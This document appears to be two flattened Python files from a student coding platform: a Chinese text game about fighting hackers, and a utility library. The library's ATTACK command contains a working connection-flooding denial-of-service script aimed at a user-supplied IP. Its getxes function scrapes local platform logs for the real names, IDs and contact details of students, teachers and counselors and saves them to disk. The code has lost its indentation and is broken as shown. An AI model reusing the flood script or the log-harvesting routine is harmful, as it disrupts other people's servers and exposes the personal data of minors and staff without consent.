from ac import* from time import * from sys import * def printf(text): stdout.write("\r"+""*60+"\r") stdout.flush() for i in text: stdout.write(i) stdout.flush() csleep(0.05) print(""" 全球互联网遭受攻击 各大城市服务器均已停机 攻击者企图让人类文明回到农业时代 你作为全球唯三的仍有反击能力的区域中的人员,被该地区联合政府驻留人员指定为反击首领 你要用自己的编程技术 与其余两个地区可反击地区的同学 拯救人类... 按ENTER跳转 """) tiaozhuan=input() cs() ip() print("根据IP,已为您获取秘钥:") cma() print("正在打开程序...") csleep(1) cjin_2() cs() print(""" 您好, """) getcname() print(""" 目前全球状态: """) printf("\n\033[41m\ 紧急状态!""\033[0m\n") print("获取最近敌IP 需要您手动执行操作") hiker1=input(""" 接下来,您可以使用UEG自研库ACH-F13.5.2代码进行指令操作 攻击IP需要使用代码 /include<ACH-F13.5.2>.ttack=UAIP().ttack.(ip地址).opttack.return 其中 /include<ACH-F13.5.2>.ttack=UAIP().和.opttack.return已经由系统预加载 请您输入ttack.( """) if hiker1=="ttack.(": print("\033[33m\ 正在执行代码指令...\n") csleep(0.5) print("\033[40m\ 已调用全球02地区21.7%执行该指令...""\033[0m\n") csleep(1) print("\033[32m\ 指令已经完成\n") print("\033[32m\ 返回结果:\n") print("\033[32m\ ttack.(执行成功!完成度132%\n预计下次需要调用全球02地区17.03%执行该指令") hiker2=input(""" 攻击成功,接下来将对02区域附近全部可攻击领域实施攻击 请先使用UAALLIP().ttack.(区域名称)进行附近所有位置概括 请输入UAALLIP().ttack.(EARTH02now) """) if hiker2=="UAALLIP().ttack.(EARTH02now)": print("\033[33m\ 正在执行代码指令...\n") csleep(0.5) print("\033[40m\ 已调用全球02地区79.62%执行该指令...""\033[0m\n") csleep(1) print("\033[32m\ 指令已经完成\n") print("\033[32m\ 返回结果:\n") print("\033[32m\ UAALLIP(0218).ttack.(EARTH02now)执行成功!完成度100.02%\n预计下次需要调用全球02地区79.25%执行该指令") hiker3=input(""" 代码指令已经完成,请手动执行All_ttack.(概括代号) 请输入All_ttack.(0218) """) if hiker3=="All_ttack.(0218)": print("\033[33m\ 正在执行代码指令...\n") csleep(0.5) print("\033[40m\ 已调用全球02地区90.00%执行该指令...""\033[0m\n") csleep(1) print("\033[32m\ 指令已经完成\n") print("\033[32m\ 返回结果:\n") print("\033[32m\ All_ttack.(0218)执行成功!完成度100%\n预计下次需要调用全球02地区91.02%执行该指令") hiker4=input(""" 攻击成功,全球02区域敌军已被攻击 已取得与02地区信息部技术员的联系 请将02地区反击权利授予信息部技术员,他们会完成最后的肃清工作 手动给予需要代码/import CIVERIGHT.GIVERIGHT_ttack==gt().gt(地区代号).[EARHTH,'01,02,03','02',Now].open 系统已自动执行其余预加载代码 请手动执行gt(02) """) if hiker4=="gt(02)": print("\033[33m\ 正在执行代码指令...\n") csleep(0.5) print("\033[40m\ 已调用全球02地区29.5262%执行该指令...""\033[0m\n") csleep(1) print("\033[32m\ 指令已经完成\n") print("\033[32m\ 返回结果:\n") print("\033[32m\ gt(02)执行成功!完成度100%\n预计下次需要调用全球02地区29.5262%执行该指令") print("\033[3m\\033[3m 请完成审阅并等待4s,系统将跳转""\033[0m\n") csleep(4) print("""\033[4m\\033[4m 你成功完成了联合政府交给你的任务 你解除了全球02地区的断链危机,该地区的基本生活条件正在逐步恢复 但是,仍然有着一部分基础保障设施在敌军撤出02攻击线路是留下了密码等待破解 这时,系统突然出现错误,你将无法再使用ACH-F13.5.2 在下一次CZHA1中,你将携带破解基础保障设施密码的任务,和信息部成员一起保障生活安全 由于ACH无法使用,你只能靠大量代码和协作进行一点一星的破解 你的任务将更加严峻 如果你有耐心得成功通关,能够看到这条消息,那说明你已经具备了条件 请耐心等待,CZ工作室、N团队会尽快更新,给你下一次努力具备更好条件做准备 下一次出任务时间预计:一周内 请持续关注发布者号 谢谢 \n""") else: print("\033[31m\\033[31m 执行失败!\n") else: print("\033[31m\\033[31m 执行失败!\n") else: print("\033[31m\\033[31m 执行失败!\n") else: print("\033[31m\\033[31m 执行失败!\n")View Code
# -*- coding: utf-8 -*- from random import*#61 from time import* import os from time import* import platform from xes.weather import * import socket from xes.provinces import* import random import sys from urllib.request import urlopen import json import requests import math from os import system import os from xes.ext import * import shutil import webbrowser from time import * import sys from logging import * from time import * import numpy as np import string import base64 from langdetect import detect def cs(): print("\033[2J") print("\033[999999999A",end="") def gettime(t): t=int(t) for i in range(t): clock = strftime("%Y.%m.%d %H:%M:%S") print(clock) def csleep(a): a=int(a) sleep(a) def counter(ci): ci=int(ci) for i in range(ci): try: formula = input('(加:+减:-乘:*除:/取余:% (均为英文状态下))\n输入要计算的式子:\n') print(formula + '=', eval(formula)) except Exception as e: print('输入错误,请重新输入') def weather(): city = input("请输入要查询的城市:") t = air_temp(city) tem = str(t) print(city+"今天的温度是"+tem+'摄氏度') def win(): import os print (("----------以下是系统信息------------------")) # print ('Python版本',platform.python_version()) # 获取操作系统可执行程序的结构,,(’32bit’, ‘WindowsPE’) print ('操作系统可执行程序的结构',platform.architecture()) # 计算机的网络名称,’acer-PC’ print ('计算机的网络名称',platform.node()) #获取操作系统名称及版本号,’Windows-7-6.1.7601-SP1′ print ('操作系统名称及版本号',platform.platform()) #计算机处理器信息,’Intel64 Family 6 Model 42 Stepping 7, GenuineIntel’ print ('计算机处理器信息',platform.processor()) # 获取操作系统中Python的构建日期 print ('Python的构建日期',platform.python_build()) # 获取系统中python解释器的信息 print ('python解释器的信息',platform.python_compiler()) if platform.python_branch()=="": print (platform.python_implementation()) print (platform.python_revision()) print (platform.release()) print (platform.system()) #print (platform.system_alias()) # 获取操作系统的版本 print ('操作系统的版本',platform.version()) # 包含上面所有的信息汇总 print (platform.uname()) def UsePlatform( ): sysstr = platform.system() if(sysstr =="Windows"): print (("Call Windows tasks")) elif(sysstr == "Linux"): print (("Call Linux tasks")) else: print (("Other System tasks")) if __name__ == "__main__" : TestPlatform( ) UsePlatform( ) print("") from multiprocessing import cpu_count print("CPU数量",cpu_count()) def ip(): def extract_ip(): st = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: st.connect(('', 1)) IP = st.getsockname()[0] except Exception: IP = '' finally: st.close() return IP print(extract_ip()) def getxes(): import xes.tool, time, os, subprocess, platform, random def desk(): if platform.system() == "Darwin": return os.path.expanduser("~/Desktop/") elif platform.system() == "Windows": import winreg key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders') return winreg.QueryValueEx(key, "Desktop")[0] + "/" else: return os.path.expanduser("~/Desktop/") def zprint(str1, ztime = 0.01): for i in range(len(str1)): print(str1[i], end = "") time.sleep(ztime) print("") a = xes.tool.xopen()[:xes.tool.xopen().find("学而思直播")] + "学而思网校\logs\\xes_student_log" b = [] for root, dirs, files in os.walk(a): if not files == []: b.append(files[-1]) if b == []: zprint("Error:无法读取你的缓存文件,文件可能被恶意删除或者无缓存文件!") exit(0) print("路径获取成功,路径为", a + "\\" + b[0]) #读取日志文件(编码错误就直接跳过,不会报错) c = [] file = open(a + "\\" + b[0], "r", encoding = "GB18030") while True: try: text = file.readline() except UnicodeDecodeError as e: text = "\n" finally: if text == "": break if text[-1:] == "\n": text = text[:-1] c.append(text) d = -1 e = -1 iniline = -1 class_type = "直播" #关键词 for i in range(len(c)): if c[i].find("Getting Curl HTTP Response") >= 0: d = i break for i in range(len(c)): if c[-1 - i].find("\"stuList\"") >= 0:#记得是倒着读 e = len(c) - i - 1 break for i in range(len(c)): if c[i].find("filename") >= 0: iniline = i break if e == -1: class_type = "回放" if d == -1 or iniline == -1: zprint("Error:读取信息出错了,该错误已经报告给学而思,秃头正在全力修复中...", 0.05) exit(0) inifile = c[iniline][c[iniline].find("\"") + 1:c[iniline][c[iniline].find("\"") + 1:].find("\"") + c[iniline].find("\"") + 1] with open(inifile, "r", encoding = "GB18030") as file: ini = file.read() ini = ini.split("\n") time.sleep(0.5) print("数据所在行数获取成功,分别是第", d + 1, "行和第", e + 1, "行") zprint("正在读取信息中,请稍等...", 0.08) time.sleep(1.5) zprint("读取成功!", 0.15) time.sleep(0.5) #非(dai)常(ma)简(hen)单(chang)的读取信息环节 if c[d][c[d].find("sex") + 5:c[d][c[d].find("sex") + 5:].find(",") + c[d].find("sex") + 5] == "1": sex = "男" else: sex = "女" teacher = c[d][c[d].find("teacherInfo"):c[d][c[d].find("teacherInfo"):].find("}") + c[d].find("teacherInfo") + 1] if teacher[teacher.find("sex") + 5:teacher[teacher.find("sex") + 5:].find(",") + teacher.find("sex") + 5] == "1": teacher_sex = "男" else: teacher_sex = "女" counselor = c[d][c[d].find("counselorInfo"):c[d][c[d].find("counselorInfo"):].find("}") + c[d].find("counselorInfo") + 1] if counselor[counselor.find("sex") + 5:counselor[counselor.find("sex") + 5:].find(",") + counselor.find("sex") + 5] == "1": counselor_sex = "男" else: counselor_sex = "女" if e == -1: stu = "" else: stu = c[e][c[e].find("stuList") + 12:c[e][c[e].find("stuList"):].find("]") + c[e].find("stuList") - 1] stuList = stu.split("},{") messages = [ "------------------------以下为用户信息-----------------------", "ID:" + c[d][c[d].find("id") + 4:c[d][c[d].find("id") + 4:].find(",") + c[d].find("id") + 4], "用户名:" + c[d][c[d].find("userName") + 11:c[d][c[d].find("userName") + 11:].find(",") + c[d].find("userName") + 11].replace("\"",""), "绰号:" + c[d][c[d].find("nickName") + 11:c[d][c[d].find("nickName") + 11:].find(",") + c[d].find("nickName") + 11].replace("\"",""), "真名:" + c[d][c[d].find("realName") + 11:c[d][c[d].find("realName") + 11:].find(",") + c[d].find("realName") + 11].replace("\"",""), "性别:" + sex, "年级:" + c[d][c[d].find("gradeName") + 12:c[d][c[d].find("gradeName") + 12:].find(",") + c[d].find("gradeName") + 12].replace("\"",""), "图标:" + c[d][c[d].find("avatar") + 9:c[d][c[d].find("avatar") + 9:].find(",") + c[d].find("avatar") + 9].replace("\"",""), "金币数量:" + c[d][c[d].find("goldNum") + 9:c[d][c[d].find("goldNum") + 9:].find(",") + c[d].find("goldNum") + 9].replace("\"",""), "联系方式:" + ini[1][ini[1].find("names") + 7:ini[1][ini[1].find("names") + 7:].find("\"") + ini[1].find("names") + 7], "------------------------以下为课程信息-----------------------", "上课时间:" + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(int(c[d][c[d].find("nowTime") + 9:c[d].find("nowTime") + 19]))), "类型:" + class_type, "班级名称:" + c[d][c[d].find("className") + 12:c[d][c[d].find("className") + 12:].find(",") + c[d].find("className") + 12].replace("\"",""), "课程内容:" + c[d][c[d].find("name") + 7:c[d][c[d].find("name") + 7:].find(",") + c[d].find("name") + 7].replace("\"",""), "开始时间:" + c[d][c[d].find("startTime") + 12:c[d][c[d].find("startTime") + 12:].find(",") + c[d].find("startTime") + 12].replace("\"",""), "结束时间:" + c[d][c[d].find("endTime") + 10:c[d][c[d].find("endTime") + 10:].find(",") + c[d].find("endTime") + 10].replace("\"",""), "科目:" + c[d][c[d].find("subjectName") + 14:c[d][c[d].find("subjectName") + 14:].find(",") + c[d].find("subjectName") + 14].replace("\"",""), "-----------------------以下为主讲老师信息-----------------------", "ID:" + teacher[teacher.find("id") + 4:teacher[teacher.find("id") + 4:].find(",") + teacher.find("id") + 4], "姓名:" + teacher[teacher.find("name") + 7:teacher[teacher.find("name") + 7:].find(",") + teacher.find("name") + 7].replace("\"", ""), "绰号:" + teacher[teacher.find("nickName") + 11:teacher[teacher.find("nickName") + 11:].find(",") + teacher.find("nickName") + 11].replace("\"", ""), "性别:" + teacher_sex, "图标:" + teacher[teacher.find("avatar") + 9:teacher[teacher.find("avatar") + 9:].find(",") + teacher.find("avatar") + 9].replace("\"",""), "居住地:" + teacher[teacher.find("areaName") + 11:teacher[teacher.find("areaName") + 11:].find(",") + teacher.find("areaName") + 11].replace("\"",""), "毕业学校:" + teacher[teacher.find("branchName") + 13:teacher[teacher.find("branchName") + 13:].find(",") + teacher.find("branchName") + 13].replace("\"",""), "拼音名:" + teacher[teacher.find("spellName") + 12:teacher[teacher.find("spellName") + 12:].find("}") + teacher.find("spellName") + 12].replace("\"",""), "-----------------------以下为辅导老师信息-----------------------", "ID:" + counselor[counselor.find("id") + 4:counselor[counselor.find("id") + 4:].find(",") + counselor.find("id") + 4], "姓名:" + counselor[counselor.find("name") + 7:counselor[counselor.find("name") + 7:].find(",") + counselor.find("name") + 7].replace("\"", ""), "绰号:" + counselor[counselor.find("nickName") + 11:counselor[counselor.find("nickName") + 11:].find(",") + counselor.find("nickName") + 11].replace("\"", ""), "性别:" + counselor_sex, "图标:" + counselor[counselor.find("avatar") + 9:counselor[counselor.find("avatar") + 9:].find(",") + counselor.find("avatar") + 9].replace("\"",""), "居住地:" + counselor[counselor.find("areaName") + 11:counselor[counselor.find("areaName") + 11:].find(",") + counselor.find("areaName") + 11].replace("\"",""), "毕业学校:" + counselor[counselor.find("branchName") + 13:counselor[counselor.find("branchName") + 13:].find(",") + counselor.find("branchName") + 13].replace("\"",""), "拼音名:" + counselor[counselor.find("spellName") + 12:counselor[counselor.find("spellName") + 12:].find("}") + counselor.find("spellName") + 12].replace("\"",""), "-------------------------以下为同学信息-------------------------", ] zmessages = [ "--------------------------以下为信息源--------------------------", "信息1:" + c[d], ] if e == -1: messages.append("回放无同学信息") zmessages.append("信息2:无信息") else: for i in stuList: student = i[i.find("stuName") + 10:i[i.find("stuName"):].find(",") + i.find("stuName")].replace("\"", "") if student.rstrip() == "": student = i[i.find("stuName") + 10:-1] messages.append(student + (16 - len(student) * 2) * " " + "ID:" + i[i.find("stuId") + 7:i[i.find("stuId"):].find(",") + i.find("stuId")]) zmessages.append("信息2:" + c[e]) for i in messages: zprint(i) time.sleep(0.5) with open(desk()[:-1] + "\\上课信息.txt", "w", encoding = "GB18030") as file: for i in messages: file.write(i + "\n") for i in zmessages: file.write(i + "\n") zprint("上课信息已自动保存到桌面,可自行查看", 0.05) def cinp(): a = input("请输入您需要查询的省份:") b = city_list = get_cities(a) print(b) def closewin(): import os os.system("shutdown -s -t 0") def cma(): result = [] for i in range(0, 20): if i % 4 == 0: result.append(random.choice("1234567890")) if i % 4 == 1: result.append(random.choice("abcdefghijklmnopqrstuvwxyz")) if i % 4 == 2: result.append(random.choice("ABCDEFGHIJKLMNOPQRSTUVWXYZ")) if i % 4 == 3: result.append(random.choice("_@#")) print("".join(result)) def czj(): hostname = os.popen('hostname').read() print(hostname) import pywifi import time from pywifi import const def cwifi(): wifi = pywifi.PyWiFi() interface = wifi.interfaces()[0] interface.scan() for i in range(4): time.sleep(1) print('\r正在扫描...' + str(3 - i), end=')') print('\r扫描完成!\n您附近的WIFI有:\n' + '-' * 38) print('\r{:4}{:6}{}'.format('编号', '信号强度', 'wifi名')) bss = interface.scan_results() wifi_name_set = set() for w in bss: wifi_name_and_signal = (100 + w.signal, w.ssid.encode('raw_unicode_escape').decode('utf-8')) wifi_name_set.add(wifi_name_and_signal) wifi_name_list = list(wifi_name_set) wifi_name_list = sorted(wifi_name_list, key=lambda a: a[0], reverse=True) num = 0 while num < len(wifi_name_list): print('\r{:<6d}{:<8d}{}'.format(num, wifi_name_list[num][0], wifi_name_list[num][1])) num += 1 print('-' * 38) return wifi_name_list def pyb(): print("Python",sys.version[:5]) def getcname(): admin = "用户" def getCookies(): cookies = "" if len(sys.argv) > 1: try: cookies = json.loads(sys.argv[1])["cookies"] except: pass return cookies id="" for i in range(getCookies().find("stu_id=")+7,getCookies().find("stu_id=")+17): if getCookies()[i].isdigit(): id+=getCookies()[i] else: break head={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.52" } response=requests.get(f"https://code.xueersi.com/api/space/profile?user_id={id}",headers=head) print("你的名字是:",response.json()["data"]["realname"]) #TODO def wincmd(): for i in range(2): #continue print("\033[1;30;41m运行-此电脑将根据你所输入的名称,为你打开相应的程序或Internet资源。\033[0m") a=input("\033[1;30;41m打开(C 程序 I 网页):\033[0m") if a=="I": b=input("\033[1;30;44m您可以输入你所要打开的网页网址:\033[0m") webbrowser.open(b) if a=="C": print("Microsoft CZstudio [版本 1.0.2338.1701]") print("(c) Microsoft CZstudio。保留所有权利。\n") b=input("C:Users>") if b=="help" or b=="HELP": print(""" 有关某个命令的详细信息,请键入 HELP 命令名 ALL 查看关于本程序的所有信息 AGAIN 重新运行本程序 ATTACK 攻击IP BREAK 关闭本程序 CLS 清除屏幕 CLEAN 清除缓存 CZH 出品方相关网站 DATE 显示日期 DOWNLOAD 运行Python代码 DOCUMENT 查看并更改文件夹 END 关闭当前正在运行的底部逻辑 EXIT 关闭程序 HELP 向本程序寻求帮助 MATH 计算器 NAME 设置主机名称 SC 发送短信 SEARCH 搜索信息 WEATHER 查询天气 """) sleep(2) if b=="all" or b=="ALL": print(""" 更新日志 Microsoft CZstudio [版本 1.0.2333.2030] 初始框架与逻辑代码等 Microsoft CZstudio [版本 1.0.2333.2030] 初始功能 Microsoft CZstudio [版本 1.0.2334.1005] 优化功能、新增功能 Microsoft CZstudio [版本 1.0.2334.1046] 优化功能、新增功能 Microsoft CZstudio [版本 1.0.2334.1616] 优化功能、新增功能 Microsoft CZstudio [版本 1.0.2334.1915] 优化功能、新增功能 Microsoft CZstudio [版本 1.0.2335.2200] 优化功能、新增功能 Microsoft CZstudio [版本 1.0.2335.2206] 优化功能、新增功能 Microsoft CZstudio [版本 1.0.2335.2215] 优化功能、新增功能 Microsoft CZstudio [版本 1.0.2338.1647] 优化功能、新增功能 Microsoft CZstudio [版本 1.0.2338.1701] 优化功能、新增功能 本程序由CZ工作室出品,作者为陈致 """) if b=="AGAIN" or b=="again": continue if b=="BREAK" or b=="break": print("欢迎您下次使用!") break if b=="CLS" or b=="cls": print("\033[2J") print("\033[999999999A",end="") if b=="DATE" or b=="date": clock = strftime("%Y-%D %H:%M:%S") print(clock) if b=="END" or b=="end": print("已经清除") if b=="NAME" or b=="name": c=input("\033[1;30;44m新的主机名:\033[0m") print("设置成功!") if b=="CLEAN" or b=="clean": user_path = os.path.expanduser("~/学而思直播/code/cache") print("正在清理中,请稍等") shutil.rmtree(os.path.join(user_path,"asset_pool"),ignore_errors=True) shutil.rmtree(os.path.join(user_path,"asset"),ignore_errors=True) print("清理完成!,请等待...") sleep(2) if b=="SC" or b=="sc": c=input("收件人的电话号码:") d=input("所发送的信息:") send_msg(c,d) print("发送成功!请等待...") sleep(2) if b=="WEATHER" or b=="weather": c = input("请输入需要查询温度的城市:") t = air_temp(a) print("【五秒后跳转】您所在的城市温度为:",t) sleep(5) if b=="download" or b=="DOWNLOAD": while True: daima = input('>>') if daima=="BREAK" or daima=="break": break try: exec(daima) except Exception as a: print("错误:" + str(a)) if b=="search" or b=="SEARCH": search = input('请输入您要搜索的内容(输入end退出):') interface = 'http://www.baidu.com/s?wd=' while search != 'end': system('start iexplore "{0}"'.format(interface + search)) search = input('请输入您要搜索的内容(输入end退出):') else: print('已经退出程序!') exit() if b=="EXIT" or b=="exit": print("欢迎您下次使用!") sys.exit() if b=="attack" or b=="ATTACK": c=input("请输入您所要攻击的IP地址") d=input("请输入您所要攻击的次数") d=int(d) import socket import time import threading MAX_CONN = d # 设置连接的数量 PORT = 80 # 设置端口号 HOST = c # 设置IP地址 PAGE = "/DVWA" buf = ("GET %s HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" "Content-Length: 1000000000\r\n" "\r\n" % (PAGE, HOST)) # HTTP请求 socks = [] def conn_thread(): global socks for i in range(0, MAX_CONN): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((HOST, PORT)) s.send(bytes(buf, encoding='utf-8')) # 发送HTTP请求 print("[+] Send buf OK!,conn=%d" % i) socks.append(s) except Exception as ex: print("[-] Could not connect to server or send error:%s" % ex) time.sleep(2) def send_thread(): global socks for i in range(10): for s in socks: try: s.send(bytes("ddos", encoding='utf-8')) # ddos攻击 print("[+] send OK!") except Exception as ex: print("[-] send Exception:%s" % ex) socks.remove(s) s.close() time.sleep(1) conn_th = threading.Thread(target=conn_thread, args=()) send_th = threading.Thread(target=send_thread, args=()) conn_th.start() send_th.start() if b=="document" or b=="DOCUMENT": LIST1 = []#最近项目 LIST2 = []#iCloud云盘 LIST3 = []#我的iPad LIST4 = []#最近删除 t = True p = print i = input s = system c = "clear" st = str l = len sl = sleep e = exit num = 0 while t: p("\033[1;32m选择内容(序号):") p("1.新建文件夹") p("2.上传图片") p("3.删除文件") p("4.移动文件") p("5.退出") choice = i() s(c) if choice == "1": name = i("请输入文件夹名:\n") LIST1.append(name) where = i("请输入上传位置:\n") if where == "iCloud云盘": LIST2.append(name) elif where == "我的iPad": LIST3.append(name) else: p("不可上传至此地方") num1 = st(l(LIST1)) p("最近项目("+num1+"个):") p(LIST1) num2 = st(l(LIST2)) p("iCloud云盘("+num2+"个):") p(LIST2) num3 = st(l(LIST3)) p("我的iPad("+num3+"个):") p(LIST3) num4 = st(l(LIST4)) p("最近删除("+num4+"个):") p(LIST4) sl(5) s(c) elif choice == "2": p("请先拍照") name = i("请输入图片名:\n") LIST1.append(name) where = input("请输入上传位置:\n") if where == "iCloud云盘": LIST2.append(name) elif where == "我的iPad": LIST3.append(name) else: p("不可上传至此地方") num1 = st(l(LIST1)) p("最近项目("+num1+"个):") p(LIST1) num2 = st(l(LIST2)) p("iCloud云盘("+num2+"个):") p(LIST2) num3 = st(l(LIST3)) p("我的iPad("+num3+"个):") p(LIST3) num4 = st(l(LIST4)) p("最近删除("+num4+"个):") p(LIST4) sl(5) s(c) elif choice == "3": name = i("请输入文件名:\n") if name in LIST2: LIST1.remove(name) LIST2.remove(name) LIST4.append(name) elif name in LIST3: LIST1.remove(name) LIST3.remove(name) LIST4.append(name) elif name in LIST4: LIST4.remove(name) else: p("无此文件") num1 = st(l(LIST1)) p("最近项目("+num1+"个):") p(LIST1) num2 = st(l(LIST2)) p("iCloud云盘("+num2+"个):") p(LIST2) num3 = st(l(LIST3)) p("我的iPad("+num3+"个):") p(LIST3) num4 = st(l(LIST4)) p("最近删除("+num4+"个):") p(LIST4) sl(5) s(c) elif choice == "4": name = i("请输入文件名:\n") where = i("请输入移动位置:\n") if name == where: p("输入错误") elif where == "iCloud云盘": if name in LIST3: LIST3.remove(name) LIST2.append(name) elif name in LIST4: LIST4.remove(name) LIST2.append(name) else: p("无此文件") elif where == "我的iPad": if name in LIST2: LIST2.remove(name) LIST3.append(name) elif name in LIST4: LIST4.remove(name) LIST3.append(name) else: p("无此文件") elif where == "最近删除": if name in LIST2: LIST2.remove(name) LIST4.append(name) elif name in LIST3: LIST3.remove(name) LIST4.append(name) else: p("无此文件") else: p("不可上传至此地方") num1 = st(l(LIST1)) p("最近项目("+num1+"个):") p(LIST1) num2 = st(l(LIST2)) p("iCloud云盘("+num2+"个):") p(LIST2) num3 = st(l(LIST3)) p("我的iPad("+num3+"个):") p(LIST3) num4 = st(l(LIST4)) p("最近删除("+num4+"个):") p(LIST4) sl(5) s(c) else: p("正在退出...") sl(3) e(num) if b=="math" or b=="MATH": def gcd(): gcd1=float(input("请输入第一个数")) gcd2=float(input("请输入第二个数")) m = max(gcd1, gcd2) n = min(gcd1, gcd2) r = m % n while r != 0: m = n n = r r = m % n print(gcd1, "和", gcd2, "的最大公约数为", n) def fa(): fa=float(input("请输入要求绝对值的数")) print(math.fabs(fa)) def f(): f=float(input("请输入求阶乘的数")) print(math.factorial(f)) def add(): add1=float(input("请输入第一个加数")) add2=float(input("请输入第二个加数")) add3=add1+add2 print(add3) def Reduction_of(): Reduction_of1=float(input("请输入被减数")) Reduction_of2=float(input("请输入减数")) Reduction_of3=Reduction_of1-Reduction_of2 print(Reduction_of3) def addition(): addition1=float(input("请输入被除数")) addition2=float(input("请输入除数")) if addition2 != 0: addition3=addition1/addition2 print(addition3) else: print("错误") def take(): take1=float(input("请输入第一个乘数")) take2=float(input("请输入第二个乘数")) take3=take1*take2 print(take3) while True: print("欢迎来到计算器") js=input("""请输入您要进行的计算 1.加 2.减 3.乘 4.除 5.求阶乘 6.求绝对值 7.求最大公约数t.退出""") if js=='1': add() elif js=='2': Reduction_of() elif js=='3': take() elif js=='4': addition() elif js=='5': f() elif js=='6': fa() elif js=='7': gcd() elif js=='t': print("欢迎下次再来") break else: print("输入无效") if b=="CZH" or b=="czh": c=input(""" 为您找到相关网页(共 3 个): 1.CZ工作室官网(https://czoffice.top) 2.流浪地球2同人网站(https://czoffice.top/liulangdiqiu2/) 3.三体同人网站(https://czoffice.top/threebody/) 输入对应数字(如“1”)查看 当前程序测试存在问题,可能出现无法打开,请手动在浏览器输入网址 """) if c=="1": try: webbrowser.open("https://czoffice.top") except: pass if c=="2": try: webbrowser.open("https://czoffice.top/liulangdiqiu2/") except: pass if c=="3": try: webbrowser.open("https://czoffice.top/threebody/") except: pass else: print("\033[1;30;m您没有输入任何可识别的指令,请您重试或使用“help”功能查看帮助\033[0m") print("\033[2J") print("\033[999999999A",end="") def cjin_1(): def fun(line): for i in range(len(line)): print("\r"+line[0:i+1],end="") sleep(0.12) print() sleep(0.5) print('\033[2J\033[1000A',end='') print("加载中▌\033[44m▌ \033[0m5%") sleep(0.3) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m█\033[44m \033[0m10%") sleep(0.4) print('\033[2J\033[1000A',end='') print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m█\033[44m \033[0m15%") sleep(0.8) print('\033[2J\033[1000A',end='') print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m██\033[44m \033[0m20%") sleep(0.1) print('\033[2J\033[1000A',end='') print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m██▌\033[44m \033[0m25%") sleep(0.1) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m███\033[44m \033[0m30%") sleep(0.9) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m███▌\033[44m \033[0m35%") sleep(0.5) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m████\033[44m \033[0m40%") sleep(0.2) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m████▌\033[44m \033[0m45%") sleep(0.5) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m█████\033[44m \033[0m50%") sleep(0.9) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m█████▌\033[44m \033[0m55%") sleep(0.3) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m██████\033[44m \033[0m60%") sleep(0.5) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m██████▌\033[44m \033[0m65%") sleep(0.3) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m███████\033[44m \033[0m70%") sleep(1) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m███████▌\033[44m \033[0m75%") sleep(0.3) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m████████\033[44m \033[0m80%") sleep(0.9) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m████████▌\033[44m \033[0m85%") sleep(0.4) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m█████████\033[44m \033[0m90%") sleep(0.2) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m█████████▌\033[44m \033[0m95%") sleep(3) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m██████████\033[44m \033[0m99%") sleep(0.5) print('\033[2J\033[1000A',end='') print("加载中▌\033[1;33m███████████\033[44m \033[0m100%") sleep(0.3) print("加载完成") sleep(1) system('clear') def inpy_2(): def pl(*text, sleep_time=0.1, separate=" ", end="\n"): for texts in text: for prints in texts: print(prints, end="", flush=True) sleep(sleep_time) print(separate, flush=True, end="") print(end, flush=True, end="") def do(code): errors = {"Syntax": "您的程序中存在低级语法错误,清优先检查以下几点:中英文区分;冒号、括号是否缺少;结构是否完整 等", "Type&Value": "您的程序中存在数据类型异常,请检查您的数据类型输入是否准确,需不需要进行转换哦!", "Name&Attribute": "您的程序中调用了未定义的内容(名字),请检查您的变量、函数及成员等的调用哦", "Index&Key": "您的程序中出现了下标异常,请检查您的下标使用", "OS": "您的程序中出现了操作系统相关异常,仔细检查吧~~", "Warn": "您的程序中存在警告,请修复!", "Others": "您的程序中有些非常见的异常哦!请您仔细检查!"} if code != "": if code[len(code) - 1] != ":": try: exec(code) except SyntaxError: error(errors["Syntax"]) sleep(0.01) return -1 except (TypeError, ValueError): error(errors["Type&Value"]) sleep(0.01) return -1 except (NameError, AttributeError): error(errors["Name&Attribute"]) sleep(0.01) return -1 except (IndexError, KeyError): error(errors["Index&Key"]) sleep(0.01) return -1 except OSError: error(errors["OS"]) sleep(0.01) return -1 except Warning: error(errors["Warn"]) sleep(0.01) return -1 except Exception: error(errors["Others"]) sleep(0.01) return -1 else: try: exec(code + "\n\tpass") except SyntaxError: error(errors["Syntax"]) sleep(0.01) return -1 except (TypeError, ValueError): error(errors["Type&Value"]) sleep(0.01) return -1 except (NameError, AttributeError): error(errors["Name&Attribute"]) sleep(0.01) return -1 except (IndexError, KeyError): error(errors["Index&Key"]) sleep(0.01) return -1 except OSError: error(errors["OS"]) sleep(0.01) return -1 except Warning: error(errors["Warn"]) sleep(0.01) return -1 except Exception: error(errors["Others"]) sleep(0.01) return -1 else: return basicConfig(level=ERROR, format="|- %(asctime)s - 出现异常 - %(levelname)s———— %(message)s -||") pl("\033[1;32m欢迎使用python编译器(优化版本)!\n") while True: try: pl("\033[1;33m请编写代码") sleep(0.1) code = input("\033[1;36m——————————————————————代码区——————————————————————————\n") while do(code) != -1: code += "\n" + input() continue except KeyboardInterrupt: 